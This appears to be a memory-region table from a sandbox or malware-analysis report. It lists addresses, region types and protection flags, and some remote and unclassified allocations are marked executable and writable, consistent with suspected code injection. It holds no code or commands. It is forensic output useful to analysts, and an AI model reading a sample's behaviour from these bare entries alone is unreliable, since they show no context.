page read and write
7642000
heap
page read and write
C01000
heap
page read and write
2223C000
stack
page read and write
C01000
heap
page read and write
2A70000
heap
page read and write
4EDB000
stack
page read and write
7790000
trusted library allocation
page read and write
3434000
heap
page read and write
7427000
heap
page read and write
1ACAFCD0000
heap
page read and write
2537BBCE000
trusted library allocation
page read and write
64FB000
heap
page read and write
214ABDDD000
heap
page read and write
333A000
heap
page read and write
225A0000
heap
page read and write
EBA000
heap
page read and write
C01000
heap
page read and write
49D0000
trusted library allocation
page read and write
F5D000
stack
page read and write
684000
heap
page read and write
283E000
stack
page read and write
2149526D000
trusted library allocation
page read and write
DBD000
trusted library allocation
page execute and read and write
7799000
heap
page read and write
9FC000
stack
page read and write
C01000
heap
page read and write
214934B0000
trusted library allocation
page read and write
F10000
trusted library section
page read and write
21150000
direct allocation
page read and write
C01000
heap
page read and write
3434000
heap
page read and write
2C50000
heap
page read and write
C01000
heap
page read and write
321B000
heap
page read and write
D17000
heap
page read and write
2870000
heap
page read and write
547F000
stack
page read and write
21BD1000
heap
page read and write
7650000
trusted library allocation
page read and write
28C8000
heap
page read and write
1040000
unkown
page readonly
703E000
stack
page read and write
9DC000
stack
page read and write
214ABC43000
heap
page read and write
4BB0000
heap
page read and write
3015000
heap
page read and write
4BC5000
heap
page read and write
E8F000
stack
page read and write
7640000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
895000
heap
page read and write
8830000
trusted library allocation
page read and write
21491C53000
heap
page read and write
8634000
heap
page read and write
21FBC000
stack
page read and write
660000
heap
page read and write
76F2000
heap
page read and write
B82B000
direct allocation
page execute and read and write
219CD000
stack
page read and write
21493B5D000
trusted library allocation
page read and write
C01000
heap
page read and write
89E000
heap
page read and write
30FD000
stack
page read and write
BBE000
stack
page read and write
4BB0000
heap
page read and write
1320000
unkown
page read and write
76A0000
trusted library allocation
page execute and read and write
C01000
heap
page read and write
70DA000
stack
page read and write
4BD3000
heap
page read and write
7C9F000
stack
page read and write
101C000
system
page execute and read and write
2537B6F0000
trusted library allocation
page read and write
1A47E66B000
heap
page read and write
47F0000
heap
page read and write
1A47EC60000
heap
page read and write
50EF2FD000
stack
page read and write
3055000
heap
page read and write
89E000
heap
page read and write
89A0000
trusted library allocation
page execute and read and write
1A47E672000
heap
page read and write
FA0000
trusted library allocation
page read and write
6D5E000
stack
page read and write
51F6000
trusted library allocation
page read and write
211A0000
direct allocation
page read and write
76EF000
heap
page read and write
6188000
heap
page read and write
2A82B7E000
stack
page read and write
721E000
stack
page read and write
D0C000
heap
page read and write
7050000
direct allocation
page read and write
BDE000
stack
page read and write
21493F63000
trusted library allocation
page read and write
923000
heap
page read and write
31E0000
trusted library section
page read and write
2900000
heap
page read and write
7826000
trusted library allocation
page read and write
C01000
heap
page read and write
333F000
heap
page read and write
1A21000
unkown
page readonly
84C0000
heap
page read and write
4629000
direct allocation
page execute and read and write
59A1000
heap
page read and write
34C6000
heap
page read and write
4990000
heap
page execute and read and write
4BCB000
heap
page read and write
444E000
stack
page read and write
21D20000
direct allocation
page read and write
739D000
stack
page read and write
4BC5000
heap
page read and write
4BC7000
heap
page read and write
6505000
heap
page read and write
1A47EC50000
heap
page read and write
7440000
heap
page execute and read and write
C01000
heap
page read and write
223D9000
unclassified section
page execute and read and write
214ABD71000
heap
page read and write
223F3000
unclassified section
page execute and read and write
38C4000
heap
page read and write
CC0000
heap
page read and write
3573000
heap
page read and write
21494F73000
trusted library allocation
page read and write
74EE000
stack
page read and write
1A47EC46000
heap
page read and write
3054000
heap
page read and write
89E000
heap
page read and write
8940000
trusted library allocation
page read and write
1A47F39B000
heap
page read and write
4E9F000
stack
page read and write
4850000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
25379CF0000
system
page execute and read and write
2A10000
heap
page read and write
4BCC000
heap
page read and write
6D0000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
5FF4000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
3569000
heap
page read and write
1A47E682000
heap
page read and write
7FF848EE0000
trusted library allocation
page execute and read and write
83A0000
heap
page read and write
85DC000
stack
page read and write
21950000
direct allocation
page read and write
25E0000
heap
page read and write
F60000
trusted library allocation
page execute and read and write
287F000
stack
page read and write
CE6000
heap
page read and write
21EC0000
remote allocation
page read and write
21F5F000
stack
page read and write
A4376FF000
stack
page read and write
75D0000
trusted library allocation
page read and write
880000
unkown
page readonly
C1000
unkown
page execute read
44F1000
heap
page read and write
4B2C000
unclassified section
page read and write
4B2D000
stack
page read and write
219FF000
stack
page read and write
6700000
direct allocation
page read and write
7DB5000
heap
page read and write
3160000
heap
page read and write
1A47E5D3000
heap
page read and write
4BD0000
heap
page read and write
4BB1000
heap
page read and write
82A0000
trusted library allocation
page read and write
1A47F3AB000
heap
page read and write
89E0000
direct allocation
page read and write
84BC000
stack
page read and write
7DC0000
heap
page read and write
217DE000
stack
page read and write
7D1F000
stack
page read and write
7770000
trusted library allocation
page read and write
C01000
heap
page read and write
82D0000
trusted library allocation
page read and write
3549000
heap
page read and write
58AD000
heap
page read and write
34C0000
heap
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
59AD000
heap
page read and write
1A47E4E0000
heap
page read and write
8715000
heap
page read and write
444D000
stack
page read and write
66E0000
direct allocation
page read and write
382E000
stack
page read and write
21493520000
trusted library allocation
page read and write
73AB000
heap
page read and write
63A0000
direct allocation
page read and write
4BD0000
heap
page read and write
2A80000
heap
page read and write
4BB5000
heap
page read and write
356A000
heap
page read and write
F8F000
stack
page read and write
3D0000
heap
page read and write
6491000
heap
page read and write
C01000
heap
page read and write
482E000
stack
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
214ABBCD000
heap
page read and write
4BB9000
heap
page read and write
3055000
heap
page read and write
53BB000
trusted library allocation
page read and write
4BD0000
heap
page read and write
C01000
heap
page read and write
85A0000
trusted library allocation
page read and write
EC0000
unkown
page readonly
21A4E000
stack
page read and write
21495391000
trusted library allocation
page read and write
4BDB000
heap
page read and write
2B10000
heap
page read and write
3204000
trusted library allocation
page read and write
2ADC000
heap
page read and write
51C0000
heap
page read and write
6EEB000
stack
page read and write
2149585F000
trusted library allocation
page read and write
49A6000
trusted library allocation
page read and write
4BD0000
heap
page read and write
1370000
heap
page read and write
324E000
stack
page read and write
2E80000
heap
page read and write
251B000
stack
page read and write
2C6D000
heap
page read and write
4BB1000
heap
page read and write
646C000
heap
page read and write
4FEE000
heap
page read and write
9D45AFC000
stack
page read and write
CF0000
heap
page read and write
7030000
direct allocation
page read and write
50C0000
heap
page read and write
4BC1000
heap
page read and write
D78000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
6F9D000
stack
page read and write
2537BA21000
trusted library allocation
page read and write
3561000
heap
page read and write
27EE000
stack
page read and write
8970000
trusted library allocation
page read and write
4C32000
heap
page read and write
F9F000
system
page execute and read and write
356E000
heap
page read and write
4C32000
heap
page read and write
7010000
direct allocation
page read and write
2A83A4D000
stack
page read and write
1ACAF960000
heap
page read and write
215EE000
stack
page read and write
3434000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
4AEF000
stack
page read and write
5FF4000
heap
page read and write
1A47F355000
heap
page read and write
6F00000
direct allocation
page read and write
59AA000
heap
page read and write
A42B000
direct allocation
page execute and read and write
3328000
heap
page read and write
4BF4000
heap
page read and write
2247C000
heap
page read and write
C01000
heap
page read and write
CF8000
heap
page read and write
D8F000
heap
page read and write
1A47EC58000
heap
page read and write
21140000
direct allocation
page read and write
6720000
direct allocation
page read and write
7710000
trusted library allocation
page read and write
5DFA000
remote allocation
page execute and read and write
37D0000
heap
page read and write
63B0000
direct allocation
page read and write
1A47E675000
heap
page read and write
6504000
heap
page read and write
2A8258E000
stack
page read and write
3054000
heap
page read and write
22785000
heap
page read and write
D3C000
heap
page read and write
4BF2000
heap
page read and write
2A83B4B000
stack
page read and write
2A82F7B000
stack
page read and write
C1000
unkown
page execute read
888000
heap
page read and write
7771000
heap
page read and write
768E000
stack
page read and write
353E000
heap
page read and write
D3F000
heap
page read and write
61F2000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
7DA7000
heap
page read and write
C01000
heap
page read and write
4BE3000
heap
page read and write
EA0000
heap
page readonly
21EC0000
heap
page read and write
550E000
heap
page read and write
222B0000
unclassified section
page execute and read and write
3E60000
remote allocation
page execute and read and write
4FED000
trusted library allocation
page read and write
C01000
heap
page read and write
2B80000
heap
page read and write
6F20000
direct allocation
page read and write
73BE000
heap
page read and write
4BC6000
heap
page read and write
39F5C000
system
page read and write
9D45B7F000
stack
page read and write
2A82AFE000
stack
page read and write
C01000
heap
page read and write
214ABC40000
heap
page read and write
F59000
trusted library allocation
page read and write
4BB1000
heap
page read and write
2278D000
heap
page read and write
C01000
heap
page read and write
5F8E000
stack
page read and write
5907000
heap
page read and write
66D000
stack
page read and write
3582000
heap
page read and write
59B4000
heap
page read and write
3A344000
system
page read and write
2BA0000
direct allocation
page read and write
3054000
heap
page read and write
89A000
heap
page read and write
FB0000
heap
page execute and read and write
4BD1000
heap
page read and write
C01000
heap
page read and write
21FFC000
stack
page read and write
C01000
heap
page read and write
75E0000
trusted library allocation
page read and write
AE2B000
direct allocation
page execute and read and write
1397000
heap
page read and write
8320000
trusted library allocation
page read and write
EE0000
unkown
page readonly
749A000
heap
page read and write
214935A0000
heap
page execute and read and write
77E0000
heap
page read and write
50C1000
heap
page read and write
2537BA0A000
trusted library allocation
page read and write
2F20000
heap
page read and write
25379ECA000
heap
page read and write
3055000
heap
page read and write
BE0000
heap
page read and write
FC5000
system
page execute and read and write
4C4C000
stack
page read and write
48E7000
unkown
page execute and read and write
4A02000
trusted library allocation
page read and write
292D000
heap
page read and write
22400000
heap
page read and write
4BC0000
heap
page read and write
7FF848E3B000
trusted library allocation
page read and write
2203E000
stack
page read and write
C50000
unkown
page readonly
7CDE000
stack
page read and write
7FF849130000
trusted library allocation
page read and write
4B6F000
stack
page read and write
4A3E000
stack
page read and write
82E0000
trusted library allocation
page read and write
351D000
heap
page read and write
47AB000
stack
page read and write
7FF848ED6000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
DB4000
trusted library allocation
page read and write
2283C000
heap
page read and write
C01000
heap
page read and write
4F91000
trusted library allocation
page read and write
59E5000
heap
page read and write
6FAD000
stack
page read and write
CF3000
heap
page read and write
2149527B000
trusted library allocation
page read and write
C01000
heap
page read and write
3210000
heap
page read and write
7570000
trusted library allocation
page execute and read and write
1A47F3AA000
heap
page read and write
214A3928000
trusted library allocation
page read and write
3581000
heap
page read and write
30E0000
unkown
page execute and read and write
58AD000
heap
page read and write
21493630000
heap
page read and write
32A0000
heap
page read and write
4912000
unclassified section
page read and write
82B5000
trusted library allocation
page read and write
34DB000
heap
page read and write
C01000
heap
page read and write
22380000
unclassified section
page execute and read and write
C01000
heap
page read and write
2FF0000
unkown
page readonly
C01000
heap
page read and write
4BB1000
heap
page read and write
C01000
heap
page read and write
D98000
heap
page read and write
21BD1000
heap
page read and write
61A7000
heap
page read and write
4BD3000
heap
page read and write
2B38000
heap
page read and write
25379ECF000
heap
page read and write
8711000
heap
page read and write
FA1000
system
page execute and read and write
61FC000
heap
page read and write
4BD7000
heap
page read and write
7570000
heap
page read and write
CCC000
heap
page read and write
4BBD000
heap
page read and write
7460000
trusted library allocation
page read and write
73DB000
stack
page read and write
77EE000
stack
page read and write
C01000
heap
page read and write
4BD0000
heap
page read and write
C01000
heap
page read and write
F43000
trusted library allocation
page execute and read and write
3054000
heap
page read and write
C01000
heap
page read and write
CDE000
heap
page read and write
1A47EC54000
heap
page read and write
8A00000
direct allocation
page read and write
3054000
heap
page read and write
53F1000
heap
page read and write
58A0000
heap
page read and write
6D1E000
stack
page read and write
46CE000
stack
page read and write
4FA7000
trusted library allocation
page read and write
2D6D000
stack
page read and write
60FF000
stack
page read and write
2C58000
heap
page read and write
1A47E8AE000
heap
page read and write
8719000
heap
page read and write
4910000
trusted library allocation
page read and write
2283C000
heap
page read and write
355F000
heap
page read and write
A436FFE000
stack
page read and write
617F000
stack
page read and write
899000
heap
page read and write
4BE4000
heap
page read and write
2E84000
heap
page read and write
4BB0000
heap
page read and write
FB5000
heap
page execute and read and write
DA0000
trusted library allocation
page read and write
7FF848FDA000
trusted library allocation
page read and write
53CA000
heap
page read and write
73C0000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
CD0000
heap
page read and write
33CE000
stack
page read and write
6E6E000
stack
page read and write
C01000
heap
page read and write
22849000
heap
page read and write
41B000
system
page execute and read and write
2B60000
heap
page read and write
343F000
stack
page read and write
EB0000
heap
page read and write
214955FB000
trusted library allocation
page read and write
C01000
heap
page read and write
75C0000
trusted library allocation
page read and write
4AF7000
trusted library allocation
page read and write
FB0000
heap
page readonly
6213000
heap
page read and write
C01000
heap
page read and write
29F0000
heap
page readonly
C01000
heap
page read and write
222F6000
direct allocation
page execute and read and write
3054000
heap
page read and write
2830000
heap
page read and write
C1000
unkown
page execute read
7FF848FC0000
trusted library allocation
page read and write
4BD0000
heap
page read and write
C01000
heap
page read and write
D5000
unkown
page read and write
3557000
heap
page read and write
4BF2000
heap
page read and write
6DCE000
stack
page read and write
4BD3000
heap
page read and write
84EE000
stack
page read and write
44CF000
stack
page read and write
88A0000
direct allocation
page read and write
F88000
heap
page read and write
C01000
heap
page read and write
52EC000
trusted library allocation
page read and write
D00000
unkown
page read and write
320D000
trusted library allocation
page execute and read and write
2960000
heap
page read and write
7FF848F40000
trusted library allocation
page execute and read and write
1A47E8AB000
heap
page read and write
2A5F000
stack
page read and write
6130000
heap
page read and write
78F0000
trusted library allocation
page read and write
5391000
trusted library allocation
page read and write
3434000
heap
page read and write
7DAD000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
496E000
stack
page read and write
21491C12000
heap
page read and write
214ABB78000
heap
page read and write
7850000
trusted library allocation
page read and write
2A6E000
stack
page read and write
5EBE000
stack
page read and write
25379DD0000
heap
page read and write
C01000
heap
page read and write
684000
heap
page read and write
5FD0000
heap
page read and write
4BB1000
heap
page read and write
73B2000
heap
page read and write
3000000
heap
page readonly
1A47E5F2000
heap
page read and write
2FD0000
heap
page read and write
4BBC000
heap
page read and write
214ABB17000
heap
page execute and read and write
3434000
heap
page read and write
4BD0000
heap
page read and write
C01000
heap
page read and write
73E5000
heap
page read and write
437E000
stack
page read and write
C01000
heap
page read and write
8559000
heap
page read and write
C3E000
stack
page read and write
643F000
heap
page read and write
8840000
trusted library allocation
page read and write
32FE000
stack
page read and write
66F0000
direct allocation
page read and write
778F000
heap
page read and write
70BE000
stack
page read and write
7713000
heap
page read and write
25379EF2000
heap
page read and write
59B4000
heap
page read and write
DDA000
trusted library allocation
page execute and read and write
7DA0000
heap
page read and write
448E000
stack
page read and write
82D9000
trusted library allocation
page read and write
4855000
trusted library allocation
page execute and read and write
4BE1000
heap
page read and write
25A0000
heap
page read and write
F70000
trusted library allocation
page read and write
1311000
unkown
page readonly
51C0000
trusted library allocation
page read and write
4BBC000
heap
page read and write
A4377FB000
stack
page read and write
76F9000
heap
page read and write
2A2B000
heap
page read and write
5B61000
trusted library allocation
page read and write
66A0000
direct allocation
page read and write
440E000
stack
page read and write
2760000
heap
page read and write
4BEE000
heap
page read and write
738E000
heap
page read and write
4BB1000
heap
page read and write
7750000
trusted library allocation
page read and write
50C1000
heap
page read and write
5505000
heap
page read and write
D10000
unkown
page read and write
7769000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
3430000
heap
page read and write
C01000
heap
page read and write
78D0000
trusted library allocation
page read and write
4BC0000
heap
page read and write
2270C000
heap
page read and write
C01000
heap
page read and write
88FE000
stack
page read and write
D94000
heap
page read and write
4BC8000
heap
page read and write
214934E0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
2E9B000
stack
page read and write
7231000
heap
page read and write
21491B45000
heap
page read and write
3582000
heap
page read and write
4C9C000
trusted library allocation
page read and write
21200000
direct allocation
page read and write
D80000
trusted library allocation
page read and write
64A5000
heap
page read and write
82E7000
stack
page read and write
7FF848E7C000
trusted library allocation
page execute and read and write
2165C000
stack
page read and write
22849000
heap
page read and write
5C1D000
stack
page read and write
1A47E667000
heap
page read and write
1A47F36F000
heap
page read and write
31AE000
stack
page read and write
357F000
heap
page read and write
21B8E000
stack
page read and write
7FF849120000
trusted library allocation
page read and write
86AC000
stack
page read and write
8137000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
73A3000
heap
page read and write
7FF8491A0000
trusted library allocation
page read and write
21491C25000
heap
page read and write
49A1000
trusted library allocation
page read and write
613C000
stack
page read and write
4BD0000
heap
page read and write
4B90000
heap
page read and write
75E7000
trusted library allocation
page read and write
6418000
heap
page read and write
47CD000
direct allocation
page execute and read and write
21220000
direct allocation
page read and write
AC5000
heap
page read and write
323B000
stack
page read and write
21AC0000
heap
page read and write
552F000
trusted library allocation
page read and write
81B0000
trusted library allocation
page read and write
21B0B000
stack
page read and write
73E000
unkown
page read and write
7FF849002000
trusted library allocation
page read and write
214ABB10000
heap
page execute and read and write
1340000
unkown
page readonly
7000000
direct allocation
page read and write
53FA000
remote allocation
page execute and read and write
516F000
stack
page read and write
2287B000
heap
page read and write
7DCB000
heap
page read and write
59D8000
heap
page read and write
F1C000
stack
page read and write
893000
heap
page read and write
CA5000
heap
page read and write
F20000
trusted library section
page read and write
55AB000
trusted library allocation
page read and write
7739000
heap
page read and write
2A88000
heap
page read and write
6208000
heap
page read and write
2DF0000
heap
page read and write
3546000
heap
page read and write
29A0000
unkown
page readonly
7FF849060000
trusted library allocation
page read and write
757E000
heap
page read and write
45D000
system
page execute and read and write
4BD0000
heap
page read and write
78E000
stack
page read and write
34C6000
heap
page read and write
7610000
trusted library allocation
page read and write
21495668000
trusted library allocation
page read and write
D6D000
heap
page read and write
8440000
trusted library allocation
page read and write
21D9E000
stack
page read and write
2FFC000
stack
page read and write
DE0000
trusted library allocation
page read and write
1A47F381000
heap
page read and write
C01000
heap
page read and write
8365000
trusted library allocation
page read and write
346F000
unkown
page read and write
C01000
heap
page read and write
7763000
heap
page read and write
374F000
stack
page read and write
353E000
heap
page read and write
1A47E662000
heap
page read and write
86C2000
heap
page read and write
21495664000
trusted library allocation
page read and write
7DA1000
heap
page read and write
4830000
trusted library allocation
page read and write
21210000
direct allocation
page read and write
C01000
heap
page read and write
34B1000
heap
page read and write
C01000
heap
page read and write
8290000
trusted library allocation
page read and write
ED0000
unkown
page readonly
2149561F000
trusted library allocation
page read and write
2247E000
heap
page read and write
7840000
trusted library allocation
page execute and read and write
8880000
direct allocation
page read and write
3054000
heap
page read and write
3545000
heap
page read and write
855C000
stack
page read and write
3055000
heap
page read and write
1A47E686000
heap
page read and write
6EAD000
stack
page read and write
21960750000
heap
page read and write
7412000
heap
page read and write
35D000
stack
page read and write
7DC3000
heap
page read and write
2B82000
heap
page read and write
61FC000
heap
page read and write
3203000
trusted library allocation
page execute and read and write
C01000
heap
page read and write
25379F00000
heap
page read and write
CD0000
unkown
page read and write
2E84000
heap
page read and write
4BD0000
heap
page read and write
39C82000
system
page read and write
4BC5000
heap
page read and write
66D0000
direct allocation
page read and write
4BD4000
heap
page read and write
C01000
heap
page read and write
715B000
stack
page read and write
89E000
heap
page read and write
2255C000
unclassified section
page execute and read and write
A436EFE000
stack
page read and write
3434000
heap
page read and write
375F000
stack
page read and write
2191C000
stack
page read and write
86C0000
heap
page read and write
763D000
heap
page read and write
5BB6000
trusted library allocation
page read and write
C01000
heap
page read and write
E90000
heap
page read and write
7729000
heap
page read and write
4BF2000
heap
page read and write
2CCF000
unkown
page read and write
7A20000
direct allocation
page read and write
21493C55000
trusted library allocation
page read and write
D32000
heap
page read and write
3055000
heap
page read and write
8672000
heap
page read and write
890000
unkown
page readonly
C01000
heap
page read and write
21F40000
direct allocation
page execute and read and write
5501000
heap
page read and write
1A47E5F0000
heap
page read and write
82FD000
stack
page read and write
2B72000
unkown
page read and write
64A5000
heap
page read and write
82F0000
trusted library allocation
page read and write
1A47EC78000
heap
page read and write
4BB1000
heap
page read and write
2A1E000
stack
page read and write
5A0E000
trusted library allocation
page read and write
58A1000
heap
page read and write
4BBF000
heap
page read and write
4A90000
heap
page execute and read and write
2BA0000
direct allocation
page read and write
7C8000
stack
page read and write
7620000
trusted library allocation
page read and write
76E5000
heap
page read and write
21491C0A000
heap
page read and write
3890000
heap
page read and write
22819000
heap
page read and write
51C1000
heap
page read and write
8870000
direct allocation
page read and write
8566000
heap
page read and write
73C2000
heap
page read and write
4FF9000
trusted library allocation
page read and write
45C000
system
page execute and read and write
2F6C000
heap
page read and write
C01000
heap
page read and write
81C0000
trusted library allocation
page read and write
870000
unkown
page readonly
562C000
heap
page read and write
2A40000
heap
page read and write
1EB000
stack
page read and write
4BF4000
heap
page read and write
B07A000
direct allocation
page execute and read and write
C01000
heap
page read and write
61F0000
heap
page read and write
74D7000
heap
page read and write
714A000
heap
page read and write
21BCF000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
2914000
heap
page read and write
D7000
unkown
page readonly
880000
heap
page read and write
63F0000
direct allocation
page read and write
222CB000
unclassified section
page execute and read and write
925000
heap
page read and write
6504000
heap
page read and write
4FBA000
trusted library allocation
page read and write
C01000
heap
page read and write
2FE0000
heap
page read and write
6FF0000
direct allocation
page read and write
21230000
direct allocation
page read and write
59E5000
heap
page read and write
49C0000
heap
page execute and read and write
1A47EC68000
heap
page read and write
22829000
heap
page read and write
4BF4000
heap
page read and write
78C000
stack
page read and write
6F10000
direct allocation
page read and write
C01000
heap
page read and write
33AF000
stack
page read and write
3270000
heap
page read and write
ECE000
stack
page read and write
214A3650000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
1A47EC4F000
heap
page read and write
C01000
heap
page read and write
2D1F000
stack
page read and write
7756000
heap
page read and write
There are 2095 hidden memdumps, click here to show them.